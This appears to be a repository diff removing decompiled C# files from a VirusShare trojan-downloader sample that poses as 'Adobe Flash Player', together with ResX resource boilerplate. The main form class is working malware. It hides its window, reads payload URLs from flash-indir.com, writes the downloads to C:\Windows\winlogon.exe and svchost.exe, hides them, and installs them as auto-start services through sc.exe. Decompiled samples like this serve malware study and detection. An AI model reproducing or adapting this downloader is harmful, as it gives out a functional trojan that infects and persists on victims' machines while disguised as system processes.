<value>AAEAAAD/////AQAAAAAAAAAEAQAAACBTeXN0ZW0uR2xvYmFsaXphdGlvbi5DdWx0dXJlSW5mbwoAAAAJY3VsdHVyZUlEDG1faXNSZWFkT25seQtjb21wYXJlSW5mbwh0ZXh0SW5mbwdudW1JbmZvDGRhdGVUaW1lSW5mbwhjYWxlbmRhcgZtX25hbWUKbV9kYXRhSXRlbRFtX3VzZVVzZXJPdmVycmlkZQAAAwMDAwMBAAAIASBTeXN0ZW0uR2xvYmFsaXphdGlvbi5Db21wYXJlSW5mbx1TeXN0ZW0uR2xvYmFsaXphdGlvbi5UZXh0SW5mbyVTeXN0ZW0uR2xvYmFsaXphdGlvbi5OdW1iZXJGb3JtYXRJbmZvJ1N5c3RlbS5HbG9iYWxpemF0aW9uLkRhdGVUaW1lRm9ybWF0SW5mbx1TeXN0ZW0uR2xvYmFsaXphdGlvbi5DYWxlbmRhcggBfwAAAAEJAgAAAAkDAAAACQQAAAAKCgYFAAAAAMoAAAAABAIAAAAgU3lzdGVtLkdsb2JhbGl6YXRpb24uQ29tcGFyZUluZm8DAAAACXdpbjMyTENJRAdjdWx0dXJlBm1fbmFtZQAAAQgIfwAAAH8AAAAJBQAAAAQDAAAAHVN5c3RlbS5HbG9iYWxpemF0aW9uLlRleHRJbmZvBgAAAA9tX2xpc3RTZXBhcmF0b3IMbV9pc1JlYWRPbmx5EWN1c3RvbUN1bHR1cmVOYW1lC21fbkRhdGFJdGVtEW1fdXNlVXNlck92ZXJyaWRlDW1fd2luMzJMYW5nSUQBAAEAAAABCAEIBgYAAAABLAEKygAAAAB/AAAABAQAAAAlU3lzdGVtLkdsb2JhbGl6YXRpb24uTnVtYmVyRm9ybWF0SW5mbyEAAAAQbnVtYmVyR3JvdXBTaXplcxJjdXJyZW5jeUdyb3VwU2l6ZXMRcGVyY2VudEdyb3VwU2l6ZXMMcG9zaXRpdmVTaWduDG5lZ2F0aXZlU2lnbhZudW1iZXJEZWNpbWFsU2VwYXJhdG9yFG51bWJlckdyb3VwU2VwYXJhdG9yFmN1cnJlbmN5R3JvdXBTZXBhcmF0b3IYY3VycmVuY3lEZWNpbWFsU2VwYXJhdG9yDmN1cnJlbmN5U3ltYm9sEmFuc2lDdXJyZW5jeVN5bWJvbAluYW5TeW1ib2wWcG9zaXRpdmVJbmZpbml0eVN5bWJvbBZuZWdhdGl2ZUluZmluaXR5U3ltYm9sF3BlcmNlbnREZWNpbWFsU2VwYXJhdG9yFXBlcmNlbnRHcm91cFNlcGFyYXRvcg1wZXJjZW50U3ltYm9sDnBlck1pbGxlU3ltYm9sDG5hdGl2ZURpZ2l0cwptX2RhdGFJdGVtE251bWJlckRlY2ltYWxEaWdpdHMVY3VycmVuY3lEZWNpbWFsRGlnaXRzF2N1cnJlbmN5UG9zaXRpdmVQYXR0ZXJuF2N1cnJlbmN5TmVnYXRpdmVQYXR0ZXJuFW51bWJlck5lZ2F0aXZlUGF0dGVybhZwZXJjZW50UG9zaXRpdmVQYXR0ZXJuFnBlcmNlbnROZWdhdGl2ZVBhdHRlcm4UcGVyY2VudERlY2ltYWxEaWdpdHMRZGlnaXRTdWJzdGl0dXRpb24KaXNSZWFkT25seRFtX3VzZVVzZXJPdmVycmlkZRV2YWxpZEZvclBhcnNlQXNOdW1iZXIXdmFsaWRGb3JQYXJzZUFzQ3VycmVuY3kHBwcBAQEBAQEBAQEBAQEBAQEGAAAAAAAAAAAAAAAAAAAICAgICAgICAgICAgIAQEBAQkHAAAACQgAAAAJBwAAAAYKAAAAASsGCwAAAAEtBgwAAAABLgYNAAAAASwGDgAAAAEsBg8AAAABLgYQAAAAAsKkCgYRAAAAA05hTgYSAAAACEluZmluaXR5BhMAAAAJLUluZmluaXR5CQwAAAAJDQAAAAYWAAAAASUGFwAAAAPigLAJGAAAAAAAAAACAAAAAgAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAgAAAAEAAAABAAEBDwcAAAABAAAACAMAAAAPCAAAAAEAAAAIAwAAABEYAAAACgAAAAYZAAAAATAGGgAAAAExBhsAAAABMgYcAAAAATMGHQAAAAE0Bh4AAAABNQYfAAAAATYGIAAAAAE3BiEAAAABOAYiAAAAATkL</value>
|
|
||||||
</data>
|
|
||||||
<data name="$this.GridSize" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFFTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAV3aWR0aAZoZWlnaHQAAAgIAgAAAAgAAAAIAAAACw==</value>
|
|
||||||
</data>
|
|
||||||
<data name="$this.TrayHeight" type="System.Int32, mscorlib">
|
|
||||||
<value>80</value>
|
|
||||||
</data>
|
|
||||||
<data name="progressBar1.Locked" type="System.Boolean, mscorlib">
|
|
||||||
<value>False</value>
|
|
||||||
</data>
|
|
||||||
</root>
|
|
@ -1,12 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: afPXB6IMQdafXFGKYw.iyT7TbdHRMHj1f8OY0
|
|
||||||
// Assembly: flashplayer, Version=11.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 06BDE18B-52D6-4D54-8321-212AE21F05B1
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.MSIL.Crypted.fr-9dcecd19b8e10f34e5fd424de314a4ff4f6a655715e6a2e6edd2182937dc1026.exe
|
|
||||||
|
|
||||||
namespace afPXB6IMQdafXFGKYw
|
|
||||||
{
|
|
||||||
internal static class iyT7TbdHRMHj1f8OY0
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,51 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: flashplayer.Properties.Resources
|
|
||||||
// Assembly: flashplayer, Version=11.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 06BDE18B-52D6-4D54-8321-212AE21F05B1
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.MSIL.Crypted.fr-9dcecd19b8e10f34e5fd424de314a4ff4f6a655715e6a2e6edd2182937dc1026.exe
|
|
||||||
|
|
||||||
using aCAxGo8jUjXrWCMv1a;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Globalization;
|
|
||||||
using System.Resources;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
|
|
||||||
namespace flashplayer.Properties
|
|
||||||
{
|
|
||||||
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
[CompilerGenerated]
|
|
||||||
internal class Resources
|
|
||||||
{
|
|
||||||
private static ResourceManager resourceMan;
|
|
||||||
private static CultureInfo resourceCulture;
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
internal Resources()
|
|
||||||
{
|
|
||||||
F6gnBCYuM3Gh9uSkf3.c3FUJW0tbGb2O();
|
|
||||||
// ISSUE: explicit constructor call
|
|
||||||
base.\u002Ector();
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Advanced)]
|
|
||||||
internal static ResourceManager ResourceManager
|
|
||||||
{
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)] get
|
|
||||||
{
|
|
||||||
if (flashplayer.Properties.Resources.resourceMan == null)
|
|
||||||
flashplayer.Properties.Resources.resourceMan = new ResourceManager("flashplayer.Properties.Resources", typeof (flashplayer.Properties.Resources).Assembly);
|
|
||||||
return flashplayer.Properties.Resources.resourceMan;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Advanced)]
|
|
||||||
internal static CultureInfo Culture
|
|
||||||
{
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)] get => flashplayer.Properties.Resources.resourceCulture;
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)] set => flashplayer.Properties.Resources.resourceCulture = value;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,120 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<root>
|
|
||||||
<!--
|
|
||||||
Microsoft ResX Schema
|
|
||||||
|
|
||||||
Version 2.0
|
|
||||||
|
|
||||||
The primary goals of this format is to allow a simple XML format
|
|
||||||
that is mostly human readable. The generation and parsing of the
|
|
||||||
various data types are done through the TypeConverter classes
|
|
||||||
associated with the data types.
|
|
||||||
|
|
||||||
Example:
|
|
||||||
|
|
||||||
... ado.net/XML headers & schema ...
|
|
||||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
|
||||||
<resheader name="version">2.0</resheader>
|
|
||||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
|
||||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
|
||||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
|
||||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
|
||||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
|
||||||
</data>
|
|
||||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
|
||||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
|
||||||
<comment>This is a comment</comment>
|
|
||||||
</data>
|
|
||||||
|
|
||||||
There are any number of "resheader" rows that contain simple
|
|
||||||
name/value pairs.
|
|
||||||
|
|
||||||
Each data row contains a name, and value. The row also contains a
|
|
||||||
type or mimetype. Type corresponds to a .NET class that support
|
|
||||||
text/value conversion through the TypeConverter architecture.
|
|
||||||
Classes that don't support this are serialized and stored with the
|
|
||||||
mimetype set.
|
|
||||||
|
|
||||||
The mimetype is used for serialized objects, and tells the
|
|
||||||
ResXResourceReader how to depersist the object. This is currently not
|
|
||||||
extensible. For a given mimetype the value must be set accordingly:
|
|
||||||
|
|
||||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
|
||||||
that the ResXResourceWriter will generate, however the reader can
|
|
||||||
read any of the formats listed below.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.binary.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.soap.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
|
||||||
value : The object must be serialized into a byte array
|
|
||||||
: using a System.ComponentModel.TypeConverter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
-->
|
|
||||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
|
||||||
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
|
||||||
<xsd:element name="root" msdata:IsDataSet="true">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:choice maxOccurs="unbounded">
|
|
||||||
<xsd:element name="metadata">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" use="required" type="xsd:string" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="assembly">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:attribute name="alias" type="xsd:string" />
|
|
||||||
<xsd:attribute name="name" type="xsd:string" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="data">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="resheader">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:choice>
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:schema>
|
|
||||||
<resheader name="resmimetype">
|
|
||||||
<value>text/microsoft-resx</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="version">
|
|
||||||
<value>2.0</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="reader">
|
|
||||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="writer">
|
|
||||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
</root>
|
|
@ -1,46 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: flashplayer.Properties.Settings
|
|
||||||
// Assembly: flashplayer, Version=11.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 06BDE18B-52D6-4D54-8321-212AE21F05B1
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.MSIL.Crypted.fr-9dcecd19b8e10f34e5fd424de314a4ff4f6a655715e6a2e6edd2182937dc1026.exe
|
|
||||||
|
|
||||||
using aCAxGo8jUjXrWCMv1a;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.Configuration;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
|
|
||||||
namespace flashplayer.Properties
|
|
||||||
{
|
|
||||||
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
|
|
||||||
[CompilerGenerated]
|
|
||||||
internal sealed class Settings : ApplicationSettingsBase
|
|
||||||
{
|
|
||||||
private static Settings defaultInstance;
|
|
||||||
|
|
||||||
public static Settings Default
|
|
||||||
{
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)] get
|
|
||||||
{
|
|
||||||
Settings defaultInstance = Settings.defaultInstance;
|
|
||||||
return defaultInstance;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
public Settings()
|
|
||||||
{
|
|
||||||
F6gnBCYuM3Gh9uSkf3.c3FUJW0tbGb2O();
|
|
||||||
// ISSUE: explicit constructor call
|
|
||||||
base.\u002Ector();
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
static Settings()
|
|
||||||
{
|
|
||||||
F6gnBCYuM3Gh9uSkf3.c3FUJW0tbGb2O();
|
|
||||||
// ISSUE: reference to a compiler-generated field
|
|
||||||
// ISSUE: object of a compiler-generated type is created
|
|
||||||
Settings.defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,243 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: flashplayer.flashplayer
|
|
||||||
// Assembly: flashplayer, Version=11.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 06BDE18B-52D6-4D54-8321-212AE21F05B1
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.MSIL.Crypted.fr-9dcecd19b8e10f34e5fd424de314a4ff4f6a655715e6a2e6edd2182937dc1026.exe
|
|
||||||
|
|
||||||
using aCAxGo8jUjXrWCMv1a;
|
|
||||||
using System;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Drawing;
|
|
||||||
using System.IO;
|
|
||||||
using System.Net;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
using System.Text;
|
|
||||||
using System.Windows.Forms;
|
|
||||||
|
|
||||||
namespace flashplayer
|
|
||||||
{
|
|
||||||
public class flashplayer : Form
|
|
||||||
{
|
|
||||||
private IContainer rhr8MwsXX;
|
|
||||||
private System.Windows.Forms.Timer jSZH6NfAg;
|
|
||||||
private System.Windows.Forms.Timer FVGgJSVgX;
|
|
||||||
private System.Windows.Forms.Timer cvEvrgwU8;
|
|
||||||
private Stream sfcihQqTU;
|
|
||||||
private Stream PSNMyh1T1;
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
protected override void Dispose(bool disposing)
|
|
||||||
{
|
|
||||||
if (disposing && this.rhr8MwsXX != null)
|
|
||||||
this.rhr8MwsXX.Dispose();
|
|
||||||
base.Dispose(disposing);
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private void pSZxv6lnj()
|
|
||||||
{
|
|
||||||
this.rhr8MwsXX = (IContainer) new Container();
|
|
||||||
this.jSZH6NfAg = new System.Windows.Forms.Timer(this.rhr8MwsXX);
|
|
||||||
this.FVGgJSVgX = new System.Windows.Forms.Timer(this.rhr8MwsXX);
|
|
||||||
this.cvEvrgwU8 = new System.Windows.Forms.Timer(this.rhr8MwsXX);
|
|
||||||
this.SuspendLayout();
|
|
||||||
this.jSZH6NfAg.Interval = 10000;
|
|
||||||
this.jSZH6NfAg.Tick += new EventHandler(this.favdDnNWe);
|
|
||||||
this.FVGgJSVgX.Interval = 10000;
|
|
||||||
this.FVGgJSVgX.Tick += new EventHandler(this.uYyIT7TbH);
|
|
||||||
this.cvEvrgwU8.Enabled = true;
|
|
||||||
this.cvEvrgwU8.Interval = 300000;
|
|
||||||
this.cvEvrgwU8.Tick += new EventHandler(this.gfIYX6xbk);
|
|
||||||
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|
||||||
this.AutoScaleMode = AutoScaleMode.Font;
|
|
||||||
this.ClientSize = new Size(10, 10);
|
|
||||||
this.FormBorderStyle = FormBorderStyle.None;
|
|
||||||
this.MaximizeBox = false;
|
|
||||||
this.MinimizeBox = false;
|
|
||||||
this.Name = nameof (flashplayer);
|
|
||||||
this.Opacity = 0.0;
|
|
||||||
this.ShowIcon = false;
|
|
||||||
this.ShowInTaskbar = false;
|
|
||||||
this.StartPosition = FormStartPosition.CenterScreen;
|
|
||||||
this.Text = "Adobe Flash Player";
|
|
||||||
this.WindowState = FormWindowState.Minimized;
|
|
||||||
this.Load += new EventHandler(this.aTBAcw4hZ);
|
|
||||||
this.ResumeLayout(false);
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
public flashplayer()
|
|
||||||
{
|
|
||||||
F6gnBCYuM3Gh9uSkf3.c3FUJW0tbGb2O();
|
|
||||||
this.rhr8MwsXX = (IContainer) null;
|
|
||||||
// ISSUE: explicit constructor call
|
|
||||||
base.\u002Ector();
|
|
||||||
this.pSZxv6lnj();
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private void favdDnNWe([In] object obj0, [In] EventArgs obj1)
|
|
||||||
{
|
|
||||||
this.WMHCj1f8O();
|
|
||||||
this.jSZH6NfAg.Stop();
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private void uYyIT7TbH([In] object obj0, [In] EventArgs obj1)
|
|
||||||
{
|
|
||||||
this.HYwqFWcrF();
|
|
||||||
this.FVGgJSVgX.Stop();
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
public void Configure(string name, string displayName, string binPath, string startupType)
|
|
||||||
{
|
|
||||||
string empty = string.Empty;
|
|
||||||
string str;
|
|
||||||
switch (startupType)
|
|
||||||
{
|
|
||||||
case "Automatic":
|
|
||||||
str = "auto";
|
|
||||||
break;
|
|
||||||
case "Disabled":
|
|
||||||
str = "disabled";
|
|
||||||
break;
|
|
||||||
case "Manual":
|
|
||||||
str = "demand";
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
str = "auto";
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
StringBuilder stringBuilder = new StringBuilder();
|
|
||||||
stringBuilder.AppendFormat("{0} {1} ", (object) "Create", (object) name);
|
|
||||||
stringBuilder.AppendFormat("binPath= \"{0}\" ", (object) binPath);
|
|
||||||
stringBuilder.AppendFormat("displayName= \"{0}\" ", (object) displayName);
|
|
||||||
stringBuilder.AppendFormat("start= \"{0}\" ", (object) str);
|
|
||||||
using (Process process = new Process())
|
|
||||||
{
|
|
||||||
process.StartInfo.FileName = "sc.exe";
|
|
||||||
process.StartInfo.Arguments = stringBuilder.ToString();
|
|
||||||
process.StartInfo.CreateNoWindow = true;
|
|
||||||
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
|
|
||||||
process.Start();
|
|
||||||
process.WaitForExit();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private void WMHCj1f8O()
|
|
||||||
{
|
|
||||||
using (WebClient webClient = new WebClient())
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
string address = this.i0sQfPXB6();
|
|
||||||
if (!(address != "baglanmadi"))
|
|
||||||
return;
|
|
||||||
this.sfcihQqTU = webClient.OpenRead(address);
|
|
||||||
this.PSNMyh1T1 = (Stream) new FileStream("C:\\Windows\\winlogon.exe", FileMode.Create, FileAccess.Write, FileShare.None);
|
|
||||||
byte[] buffer = new byte[2048];
|
|
||||||
int count;
|
|
||||||
while ((count = this.sfcihQqTU.Read(buffer, 0, buffer.Length)) > 0)
|
|
||||||
this.PSNMyh1T1.Write(buffer, 0, count);
|
|
||||||
this.sfcihQqTU.Close();
|
|
||||||
this.PSNMyh1T1.Close();
|
|
||||||
System.IO.File.SetAttributes("C:\\Windows\\winlogon.exe", FileAttributes.Hidden);
|
|
||||||
this.Configure("winlogon", "winlogon", "C:\\Windows\\winlogon.exe", "auto");
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private string i0sQfPXB6()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
StreamReader streamReader = new StreamReader(WebRequest.Create("http://www.flash-indir.com/download.txt").GetResponse().GetResponseStream());
|
|
||||||
string str1 = string.Empty;
|
|
||||||
for (string str2 = streamReader.ReadLine(); str2 != null; str2 = streamReader.ReadLine())
|
|
||||||
{
|
|
||||||
Console.WriteLine(str2);
|
|
||||||
if (str2 != null && str2 != string.Empty)
|
|
||||||
str1 = str2;
|
|
||||||
}
|
|
||||||
streamReader.Close();
|
|
||||||
return str1;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
return "baglanmadi";
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private string mQd5afXFG()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
StreamReader streamReader = new StreamReader(WebRequest.Create("http://www.flash-indir.com/indir.txt").GetResponse().GetResponseStream());
|
|
||||||
string str1 = string.Empty;
|
|
||||||
for (string str2 = streamReader.ReadLine(); str2 != null; str2 = streamReader.ReadLine())
|
|
||||||
{
|
|
||||||
Console.WriteLine(str2);
|
|
||||||
if (str2 != null && str2 != string.Empty)
|
|
||||||
str1 = str2;
|
|
||||||
}
|
|
||||||
streamReader.Close();
|
|
||||||
return str1;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
return "baglanmadi";
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private void HYwqFWcrF()
|
|
||||||
{
|
|
||||||
using (WebClient webClient = new WebClient())
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
string address = this.mQd5afXFG();
|
|
||||||
if (!(address != "baglanmadi"))
|
|
||||||
return;
|
|
||||||
this.sfcihQqTU = webClient.OpenRead(address);
|
|
||||||
this.PSNMyh1T1 = (Stream) new FileStream("C:\\Windows\\svchost.exe", FileMode.Create, FileAccess.Write, FileShare.None);
|
|
||||||
byte[] buffer = new byte[2048];
|
|
||||||
int count;
|
|
||||||
while ((count = this.sfcihQqTU.Read(buffer, 0, buffer.Length)) > 0)
|
|
||||||
this.PSNMyh1T1.Write(buffer, 0, count);
|
|
||||||
this.sfcihQqTU.Close();
|
|
||||||
this.PSNMyh1T1.Close();
|
|
||||||
System.IO.File.SetAttributes("C:\\Windows\\svchost.exe", FileAttributes.Hidden);
|
|
||||||
this.Configure("svchost", "svchost", "C:\\Windows\\svchost.exe", "auto");
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private void aTBAcw4hZ([In] object obj0, [In] EventArgs obj1)
|
|
||||||
{
|
|
||||||
this.Visible = false;
|
|
||||||
this.Hide();
|
|
||||||
if (!System.IO.File.Exists("C:\\Windows\\csrss.exe"))
|
|
||||||
this.jSZH6NfAg.Start();
|
|
||||||
if (System.IO.File.Exists("C:\\Windows\\svchost.exe"))
|
|
||||||
return;
|
|
||||||
this.FVGgJSVgX.Start();
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
private void gfIYX6xbk([In] object obj0, [In] EventArgs obj1) => Application.Exit();
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,120 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<root>
|
|
||||||
<!--
|
|
||||||
Microsoft ResX Schema
|
|
||||||
|
|
||||||
Version 2.0
|
|
||||||
|
|
||||||
The primary goals of this format is to allow a simple XML format
|
|
||||||
that is mostly human readable. The generation and parsing of the
|
|
||||||
various data types are done through the TypeConverter classes
|
|
||||||
associated with the data types.
|
|
||||||
|
|
||||||
Example:
|
|
||||||
|
|
||||||
... ado.net/XML headers & schema ...
|
|
||||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
|
||||||
<resheader name="version">2.0</resheader>
|
|
||||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
|
||||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
|
||||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
|
||||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
|
||||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
|
||||||
</data>
|
|
||||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
|
||||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
|
||||||
<comment>This is a comment</comment>
|
|
||||||
</data>
|
|
||||||
|
|
||||||
There are any number of "resheader" rows that contain simple
|
|
||||||
name/value pairs.
|
|
||||||
|
|
||||||
Each data row contains a name, and value. The row also contains a
|
|
||||||
type or mimetype. Type corresponds to a .NET class that support
|
|
||||||
text/value conversion through the TypeConverter architecture.
|
|
||||||
Classes that don't support this are serialized and stored with the
|
|
||||||
mimetype set.
|
|
||||||
|
|
||||||
The mimetype is used for serialized objects, and tells the
|
|
||||||
ResXResourceReader how to depersist the object. This is currently not
|
|
||||||
extensible. For a given mimetype the value must be set accordingly:
|
|
||||||
|
|
||||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
|
||||||
that the ResXResourceWriter will generate, however the reader can
|
|
||||||
read any of the formats listed below.
|
|
||||||
|
|
||||||
